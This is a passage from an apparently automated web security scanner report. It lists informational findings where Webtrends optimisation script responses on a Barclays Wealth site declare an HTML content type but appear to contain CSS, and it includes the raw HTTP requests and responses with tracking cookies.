Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=052836ce; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202f2ddfb; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c5
75d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6
807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e932029c8164; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01ca2f20; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202d188d0; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.42. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=030ea120; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200feed40; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.43. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0561583b; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0008fc39; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203169299; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a
7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897
fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e932043ee114; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; Expires=Sun, 01-Jan-2012 00:03:18 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01c65249; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203b7c335; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.45. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
